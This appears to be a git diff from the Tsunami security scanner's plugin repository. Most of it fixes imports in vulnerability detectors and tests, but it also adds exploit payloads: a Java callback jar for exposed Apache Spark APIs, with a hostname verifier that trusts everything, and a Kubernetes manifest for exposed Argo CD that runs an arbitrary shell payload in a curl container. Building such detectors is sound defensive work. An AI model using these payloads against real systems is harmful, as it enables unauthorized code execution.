Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/payloads/apache_spark_exposed_api/.gitignore b/payloads/apache_spark_exposed_api/.gitignore new file mode 100644 index 000000000..6b468b62a --- /dev/null +++ b/payloads/apache_spark_exposed_api/.gitignore @@ -0,0 +1 @@ +*.class diff --git a/payloads/apache_spark_exposed_api/README.md b/payloads/apache_spark_exposed_api/README.md new file mode 100644 index 000000000..6a0a4c9b4 --- /dev/null +++ b/payloads/apache_spark_exposed_api/README.md @@ -0,0 +1,6 @@ +## Build payload + +```bash +javac Tsunami.java TsunamiHostnameVerifier.java +jar cvf Tsunami_Apache_Spark_Exploit.jar Tsunami.class TsunamiHostnameVerifier.class +``` diff --git a/payloads/apache_spark_exposed_api/Tsunami.java b/payloads/apache_spark_exposed_api/Tsunami.java new file mode 100644 index 000000000..2c2323c4f --- /dev/null +++ b/payloads/apache_spark_exposed_api/Tsunami.java @@ -0,0 +1,16 @@ +import java.net.HttpURLConnection; +import java.net.URL; +import javax.net.ssl.HttpsURLConnection; + +public class Tsunami { + + public static void main(String[] args) throws Exception { + + // Create and set all-trusting host name verifier to avoid certificate issues + HttpsURLConnection.setDefaultHostnameVerifier(new TsunamiHostnameVerifier()); + // Create HTTP request to resource + URL url = new URL(args[0]); + HttpURLConnection con = (HttpURLConnection) url.openConnection(); + con.getInputStream(); + } +} diff --git a/payloads/apache_spark_exposed_api/TsunamiHostnameVerifier.java b/payloads/apache_spark_exposed_api/TsunamiHostnameVerifier.java new file mode 100644 index 000000000..ce24c45a9 --- /dev/null +++ b/payloads/apache_spark_exposed_api/TsunamiHostnameVerifier.java @@ -0,0 +1,9 @@ +import javax.net.ssl.HostnameVerifier; +import javax.net.ssl.SSLSession; + +public class TsunamiHostnameVerifier implements HostnameVerifier { + public boolean verify(String arg0, SSLSession arg1) { + return true; + } +} +; diff --git a/payloads/apache_spark_exposed_api/Tsunami_Apache_Spark_Exploit.jar b/payloads/apache_spark_exposed_api/Tsunami_Apache_Spark_Exploit.jar new file mode 100644 index 000000000..657ed8d9d Binary files /dev/null and b/payloads/apache_spark_exposed_api/Tsunami_Apache_Spark_Exploit.jar differ diff --git a/payloads/argo-cd-exposed-ui/guestbook-ui.jsonnet b/payloads/argo-cd-exposed-ui/guestbook-ui.jsonnet new file mode 100644 index 000000000..c744a1f43 --- /dev/null +++ b/payloads/argo-cd-exposed-ui/guestbook-ui.jsonnet @@ -0,0 +1,86 @@ +function ( + payload="" +) + [ + { + "apiVersion": "v1", + "kind": "Service", + "metadata": { + "name": "nginx", + "namespace": "tsunami-security-scanner" + }, + "spec": { + "type": "LoadBalancer", + "selector": { + "app.kubernetes.io/name": "nginx" + }, + "ports": [ + { + "protocol": "TCP", + "port": 80, + "targetPort": "http" + } + ] + } + }, + { + "apiVersion": "v1", + "kind": "Namespace", + "metadata": { + "name": "tsunami-security-scanner" + } + }, + { + "apiVersion": "apps/v1", + "kind": "Deployment", + "metadata": { + "name": "nginx", + "namespace": "tsunami-security-scanner", + "labels": { + "app.kubernetes.io/name": "nginx" + } + }, + "spec": { + "replicas": 1, + "selector": { + "matchLabels": { + "app.kubernetes.io/name": "nginx" + } + }, + "template": { + "metadata": { + "labels": { + "app.kubernetes.io/name": "nginx" + } + }, + "spec": { + "initContainers": [ + { + "name": "download-tools", + "image": "curlimages/curl:7.78.0", + "command": [ + "/bin/sh", + "-c" + ], + "args": [ + payload + ] + } + ], + "containers": [ + { + "name": "nginx", + "image": "nginx:1.24", + "ports": [ + { + "name": "http", + "containerPort": 80 + } + ] + } + ] + } + } + } + }, + ] diff --git a/py_plugins/examples/example_py_vuln_detector.py b/py_plugins/examples/example_py_vuln_detector.py index cc210687e..def3c48ed 100644 --- a/py_plugins/examples/example_py_vuln_detector.py +++ b/py_plugins/examples/example_py_vuln_detector.py @@ -14,13 +14,13 @@ """Example Python vulnerability detector.""" from absl import logging -from google3.google.protobuf import timestamp_pb2 -from google3.third_party.java_src.tsunami.plugin_server.py import tsunami_plugin -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.http_client import HttpClient -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_generator import PayloadGenerator -from google3.third_party.java_src.tsunami.proto import detection_pb2 -from google3.third_party.java_src.tsunami.proto import plugin_representation_pb2 -from google3.third_party.java_src.tsunami.proto import vulnerability_pb2 +from google.protobuf import timestamp_pb2 +import tsunami_plugin +from common.net.http.http_client import HttpClient +from plugin.payload.payload_generator import PayloadGenerator +import detection_pb2 +import plugin_representation_pb2 +import vulnerability_pb2 PluginInfo = plugin_representation_pb2.PluginInfo diff --git a/py_plugins/examples/example_py_vuln_detector_test.py b/py_plugins/examples/example_py_vuln_detector_test.py index dad634da0..5d50d4d0f 100644 --- a/py_plugins/examples/example_py_vuln_detector_test.py +++ b/py_plugins/examples/example_py_vuln_detector_test.py @@ -15,18 +15,18 @@ import unittest.mock as umock from absl.testing import absltest -from google3.google.protobuf import timestamp_pb2 -from google3.third_party.java_src.tsunami.plugin_server.py import tsunami_plugin -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.requests_http_client import RequestsHttpClientBuilder -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_generator import PayloadGenerator -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_secret_generator import PayloadSecretGenerator -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_utility import get_parsed_payload -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.tcs_client import TcsClient -from google3.third_party.java_src.tsunami.proto import detection_pb2 -from google3.third_party.java_src.tsunami.proto import network_service_pb2 -from google3.third_party.java_src.tsunami.proto import reconnaissance_pb2 -from google3.third_party.java_src.tsunami.proto import vulnerability_pb2 -from google3.third_party.tsunami_plugins.py_plugins.examples import example_py_vuln_detector +from google.protobuf import timestamp_pb2 +import tsunami_plugin +from common.net.http.requests_http_client import RequestsHttpClientBuilder +from plugin.payload.payload_generator import PayloadGenerator +from plugin.payload.payload_secret_generator import PayloadSecretGenerator +from plugin.payload.payload_utility import get_parsed_payload +from plugin.tcs_client import TcsClient +import detection_pb2 +import network_service_pb2 +import reconnaissance_pb2 +import vulnerability_pb2 +from third_party.tsunami_plugins.py_plugins.examples import example_py_vuln_detector # Callback server diff --git a/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector.py b/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector.py index faf53cb7b..e27ef815f 100644 --- a/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector.py +++ b/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector.py @@ -15,15 +15,15 @@ """A Tsunami plugin for detecting exposed UI from Jupyter.""" from absl import logging -from google3.google.protobuf import timestamp_pb2 -from google3.third_party.java_src.tsunami.plugin_server.py import tsunami_plugin -from google3.third_party.java_src.tsunami.plugin_server.py.common.data import network_service_utils -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.http_client import HttpClient -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.http_request import HttpRequest -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.http_status import HttpStatus -from google3.third_party.java_src.tsunami.proto import detection_pb2 -from google3.third_party.java_src.tsunami.proto import plugin_representation_pb2 -from google3.third_party.java_src.tsunami.proto import vulnerability_pb2 +from google.protobuf import timestamp_pb2 +import tsunami_plugin +from common.data import network_service_utils +from common.net.http.http_client import HttpClient +from common.net.http.http_request import HttpRequest +from common.net.http.http_status import HttpStatus +import detection_pb2 +import plugin_representation_pb2 +import vulnerability_pb2 _VULN_DESCRIPTION = ( 'This detector checks whether a unauthenticated Jupyter Notebook is' diff --git a/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector_test.py b/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector_test.py index f09825846..851be9d05 100644 --- a/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector_test.py +++ b/py_plugins/jupyter_exposed_ui/jupyter_exposed_ui_detector_test.py @@ -18,20 +18,20 @@ import requests_mock -from google3.third_party.java_src.tsunami.plugin_server.py.common.data import network_endpoint_utils -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.requests_http_client import RequestsHttpClientBuilder -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_generator import PayloadGenerator -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_secret_generator import PayloadSecretGenerator -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_utility import get_parsed_payload -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.tcs_client import TcsClient -from google3.third_party.java_src.tsunami.proto import detection_pb2 -from google3.third_party.java_src.tsunami.proto import network_pb2 -from google3.third_party.java_src.tsunami.proto import network_service_pb2 -from google3.third_party.java_src.tsunami.proto import reconnaissance_pb2 -from google3.third_party.java_src.tsunami.proto import software_pb2 -from google3.third_party.java_src.tsunami.proto import vulnerability_pb2 -from google3.third_party.tsunami_plugins.py_plugins.jupyter_exposed_ui import jupyter_exposed_ui_detector -from google3.third_party.tsunami_plugins.py_plugins.jupyter_exposed_ui.jupyter_exposed_ui_detector import _VULN_REMEDIATION +from common.data import network_endpoint_utils +from common.net.http.requests_http_client import RequestsHttpClientBuilder +from plugin.payload.payload_generator import PayloadGenerator +from plugin.payload.payload_secret_generator import PayloadSecretGenerator +from plugin.payload.payload_utility import get_parsed_payload +from plugin.tcs_client import TcsClient +import detection_pb2 +import network_pb2 +import network_service_pb2 +import reconnaissance_pb2 +import software_pb2 +import vulnerability_pb2 +from third_party.tsunami_plugins.py_plugins.jupyter_exposed_ui import jupyter_exposed_ui_detector +from third_party.tsunami_plugins.py_plugins.jupyter_exposed_ui.jupyter_exposed_ui_detector import _VULN_REMEDIATION _TARGET_URL = 'vuln-target.com' diff --git a/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector.py b/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector.py index 8f829f812..a470a2b44 100644 --- a/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector.py +++ b/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector.py @@ -14,18 +14,18 @@ """A Tsunami plugin for detecting CVE-2022-22963.""" import time from absl import logging -from google3.google.protobuf import timestamp_pb2 -from google3.third_party.java_src.tsunami.plugin_server.py import tsunami_plugin -from google3.third_party.java_src.tsunami.plugin_server.py.common.data import network_endpoint_utils -from google3.third_party.java_src.tsunami.plugin_server.py.common.data import network_service_utils -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.http_client import HttpClient -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.http_headers import HttpHeaders -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.http_request import HttpRequest -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_generator import PayloadGenerator -from google3.third_party.java_src.tsunami.proto import detection_pb2 -from google3.third_party.java_src.tsunami.proto import payload_generator_pb2 as pg -from google3.third_party.java_src.tsunami.proto import plugin_representation_pb2 -from google3.third_party.java_src.tsunami.proto import vulnerability_pb2 +from google.protobuf import timestamp_pb2 +import tsunami_plugin +from common.data import network_endpoint_utils +from common.data import network_service_utils +from common.net.http.http_client import HttpClient +from common.net.http.http_headers import HttpHeaders +from common.net.http.http_request import HttpRequest +from plugin.payload.payload_generator import PayloadGenerator +import detection_pb2 +import payload_generator_pb2 as pg +import plugin_representation_pb2 +import vulnerability_pb2 _VULN_PATH = 'functionRouter' diff --git a/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector_test.py b/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector_test.py index bf2b3cd31..438ceb0c9 100644 --- a/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector_test.py +++ b/py_plugins/spring_cloud_function_cve_202222963/spring_cloud_function_detector_test.py @@ -17,23 +17,23 @@ from absl.testing import absltest import requests_mock -from google3.third_party.java_src.tsunami.plugin_server.py import tsunami_plugin -from google3.third_party.java_src.tsunami.plugin_server.py.common.data import network_endpoint_utils -from google3.third_party.java_src.tsunami.plugin_server.py.common.net.http.requests_http_client import RequestsHttpClientBuilder -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_generator import PayloadGenerator -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_secret_generator import PayloadSecretGenerator -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.payload.payload_utility import get_parsed_payload -from google3.third_party.java_src.tsunami.plugin_server.py.plugin.tcs_client import TcsClient -from google3.third_party.java_src.tsunami.proto import detection_pb2 -from google3.third_party.java_src.tsunami.proto import network_pb2 -from google3.third_party.java_src.tsunami.proto import network_service_pb2 -from google3.third_party.java_src.tsunami.proto import plugin_representation_pb2 -from google3.third_party.java_src.tsunami.proto import reconnaissance_pb2 -from google3.third_party.java_src.tsunami.proto import software_pb2 -from google3.third_party.java_src.tsunami.proto import vulnerability_pb2 -from google3.third_party.tsunami_plugins.py_plugins.spring_cloud_function_cve_202222963 import spring_cloud_function_detector -from google3.third_party.tsunami_plugins.py_plugins.spring_cloud_function_cve_202222963.spring_cloud_function_detector import _VULN_DESCRIPTION -from google3.third_party.tsunami_plugins.py_plugins.spring_cloud_function_cve_202222963.spring_cloud_function_detector import _VULN_PATH +import tsunami_plugin +from common.data import network_endpoint_utils +from common.net.http.requests_http_client import RequestsHttpClientBuilder +from plugin.payload.payload_generator import PayloadGenerator +from plugin.payload.payload_secret_generator import PayloadSecretGenerator +from plugin.payload.payload_utility import get_parsed_payload +from plugin.tcs_client import TcsClient +import detection_pb2 +import network_pb2 +import network_service_pb2 +import plugin_representation_pb2 +import reconnaissance_pb2 +import software_pb2 +import vulnerability_pb2 +from third_party.tsunami_plugins.py_plugins.spring_cloud_function_cve_202222963 import spring_cloud_function_detector +from third_party.tsunami_plugins.py_plugins.spring_cloud_function_cve_202222963.spring_cloud_function_detector import _VULN_DESCRIPTION +from third_party.tsunami_plugins.py_plugins.spring_cloud_function_cve_202222963.spring_cloud_function_detector import _VULN_PATH # Callback server